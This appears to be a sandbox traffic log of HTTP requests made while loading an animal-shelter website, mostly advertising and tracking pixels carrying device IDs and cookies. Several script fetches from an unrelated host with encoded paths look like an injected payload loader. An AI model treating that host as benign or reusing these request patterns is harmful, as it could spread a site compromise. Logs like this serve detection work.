Source: global trafficHTTP traffic detected: GET /tr/?id=1174527456525563&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387957087&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1174527456525563&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387957087&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger=navigation-source, event-sourceReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /signals/config/1401480206566122?v=2.9.179&r=stable&domain=indyhumane.org&hme=b8122d5d96cd6f542162ba4f497489972d1ebe228d24c39d34f560e30ae932ce&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C203%2C202%2C204%2C209%2C210%2C211%2C207%2C199%2C133%2C164%2C198%2C200%2C123%2C158%2C146%2C152%2C130%2C236%2C117%2C128%2C237%2C166%2C120%2C239%2C167%2C137%2C124%2C155%2C149%2C195%2C114%2C129 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /idsync/ex/receive?partner_id=2499&partner_device_id=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553 HTTP/1.1Host: pixel.tapad.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pixel-sync.sitescout.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /384136.gif?partner_uid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent= HTTP/1.1Host: idsync.rlcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pixel-sync.sitescout.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ibs:dpid=82530&dpuuid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent= HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pixel-sync.sitescout.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /load/?p=204&g=700&j=0&buid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent= HTTP/1.1Host: loadm.exelator.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pixel-sync.sitescout.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /qmap?c=1389&tp=STSC&tpid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.crwdcntrl.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pixel-sync.sitescout.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /up/a9d63b08fec1b65f?cookieQ=1&cntr_url=https%3A%2F%2Findyhumane.org%2F HTTP/1.1Host: pixel.sitescout.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ssuma=eyIyIjoxNzM2Mzg3OTU3OTQ1LCI0IjoxNzM2Mzg3OTU3OTQ1LCIzOSI6MTczNjM4Nzk1Nzk0NSwiNyI6MTczNjM4Nzk1Nzk0NSwiOCI6MTczNjM4Nzk1Nzk0NX0; ssi=49849c23-3428-4558-a196-de2f709756ec#1736387957597
Source: global trafficHTTP traffic detected: GET /idsync/ex/receive/check?partner_id=2499&partner_device_id=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553 HTTP/1.1Host: pixel.tapad.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pixel-sync.sitescout.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TapAd_TS=1736387958854; TapAd_DID=dcf9376c-b388-4443-970c-4d2581bbbe3d
Source: global trafficHTTP traffic detected: GET /SzlpnTAbCvQvG1OvfQpFvzkbU78xQAX7O1sfvzY= HTTP/1.1Host: virtual.urban-orthodontics.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=1401480206566122&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387958309&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /demconf.jpg?et:ibs%7cdata:dpid=82530&dpuuid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent= HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pixel-sync.sitescout.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=01656638509830825063211454695126882067
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1401480206566122&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387958309&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source, triggerReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=1174527456525563&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387957087&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /signals/config/1401480206566122?v=2.9.179&r=stable&domain=indyhumane.org&hme=b8122d5d96cd6f542162ba4f497489972d1ebe228d24c39d34f560e30ae932ce&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C203%2C202%2C204%2C209%2C210%2C211%2C207%2C199%2C133%2C164%2C198%2C200%2C123%2C158%2C146%2C152%2C130%2C236%2C117%2C128%2C237%2C166%2C120%2C239%2C167%2C137%2C124%2C155%2C149%2C195%2C114%2C129 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1174527456525563&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387957087&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /td/ga/rul?tid=G-RSYQJ6KTLL&gacid=932040568.1736387953&gtm=45je5170v9134491864za200&dma=0&gcd=13l3l3l3l2l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101925629~102067555~102067808~102081485~102198178&z=668126290 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
Source: global trafficHTTP traffic detected: GET /qmap?c=1389&tp=STSC&tpid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent=&ct=y HTTP/1.1Host: sync.crwdcntrl.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pixel-sync.sitescout.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _cc_cc=ctst
Source: global trafficHTTP traffic detected: GET /idsync/ex/receive/check?partner_id=2499&partner_device_id=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553 HTTP/1.1Host: pixel.tapad.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TapAd_TS=1736387958854; TapAd_DID=dcf9376c-b388-4443-970c-4d2581bbbe3d; TapAd_3WAY_SYNCS=
Source: global trafficHTTP traffic detected: GET /w1EdyrhzfqOncyf49WIx6LAleLrhaz+rrTBxs7k0QqyzczHosXMn6Kk3b7OhM2e5qCRnsrsiP7c= HTTP/1.1Host: virtual.urban-orthodontics.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /demconf.jpg?et:ibs%7cdata:dpid=82530&dpuuid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent= HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=01656638509830825063211454695126882067; dpm=01656638509830825063211454695126882067
Source: global trafficHTTP traffic detected: GET /tr/?id=1401480206566122&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387958309&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1401480206566122&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387958309&sw=1280&sh=1024&v=2.9.179&r=stable&ec=0&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /qmap?c=1389&tp=STSC&tpid=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553&gdpr=0&gdpr_consent=&ct=y HTTP/1.1Host: sync.crwdcntrl.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _cc_dc=1; _cc_id=b8425e6f88cd7ce9278ed5f3930daaad; _cc_cc="ACZ4nGNQSLIwMTJNNUuzsEhOMU9OtTQyt0hNMU0ztjQ2SElMTExhAIL0et0KBgQAAGOfCxA%3D"; _cc_aud="ABR4nGNgYGBIr9etYIADABNrAYw%3D"
Source: global trafficHTTP traffic detected: GET /w1EdyrhzfqOncyf49WIx6LAleLrhaz+rrTBxs7k0QqyzczHosXMn6Kk3b7OhM2e5qCRnsrsiP7c= HTTP/1.1Host: virtual.urban-orthodontics.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=1174527456525563&ev=SubscribedButtonClick&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387961160&cd[buttonFeatures]=%7B%22classList%22%3A%22tcb-button-text%20thrv-inline-text%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22I%20want%20a%20cat!%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22span%22%2C%22type%22%3Anull%7D&cd[buttonText]=I%20want%20a%20cat!&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22IndyHumane%20-%20IndyHumane%22%7D&sw=1280&sh=1024&udff[st]=b5252c3a46889dfab36f8b107b182bce34c7d892ad371e2c62980177440843eb&udff[em]=044ca09b8400e82db8fb1ae54f2bdb31e7639d757f7e5bde0ecd8fe086f18ad2&v=2.9.179&r=stable&ec=1&o=6174&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&es=automatic&tm=3&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1174527456525563&ev=SubscribedButtonClick&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387961160&cd[buttonFeatures]=%7B%22classList%22%3A%22tcb-button-text%20thrv-inline-text%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22I%20want%20a%20cat!%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22span%22%2C%22type%22%3Anull%7D&cd[buttonText]=I%20want%20a%20cat!&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22IndyHumane%20-%20IndyHumane%22%7D&sw=1280&sh=1024&udff[st]=b5252c3a46889dfab36f8b107b182bce34c7d892ad371e2c62980177440843eb&udff[em]=044ca09b8400e82db8fb1ae54f2bdb31e7639d757f7e5bde0ecd8fe086f18ad2&v=2.9.179&r=stable&ec=1&o=6174&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&es=automatic&tm=3&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: trigger, event-sourceReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=1401480206566122&ev=SubscribedButtonClick&dl=https%3A%2F%2Findyhumane.org%2F&rl=&if=false&ts=1736387961162&cd[buttonFeatures]=%7B%22classList%22%3A%22tcb-button-text%20thrv-inline-text%22%2C%22destination%22%3A%22%22%2C%22id%22%3A%22%22%2C%22imageUrl%22%3A%22%22%2C%22innerText%22%3A%22I%20want%20a%20cat!%22%2C%22numChildButtons%22%3A0%2C%22tag%22%3A%22span%22%2C%22type%22%3Anull%7D&cd[buttonText]=I%20want%20a%20cat!&cd[formFeatures]=%5B%5D&cd[pageFeatures]=%7B%22title%22%3A%22IndyHumane%20-%20IndyHumane%22%7D&sw=1280&sh=1024&udff[st]=b5252c3a46889dfab36f8b107b182bce34c7d892ad371e2c62980177440843eb&udff[em]=044ca09b8400e82db8fb1ae54f2bdb31e7639d757f7e5bde0ecd8fe086f18ad2&v=2.9.179&r=stable&ec=1&o=6174&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387955689&coo=false&dpo=LDU&dpoco=0&dpost=0&es=automatic&tm=3&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: 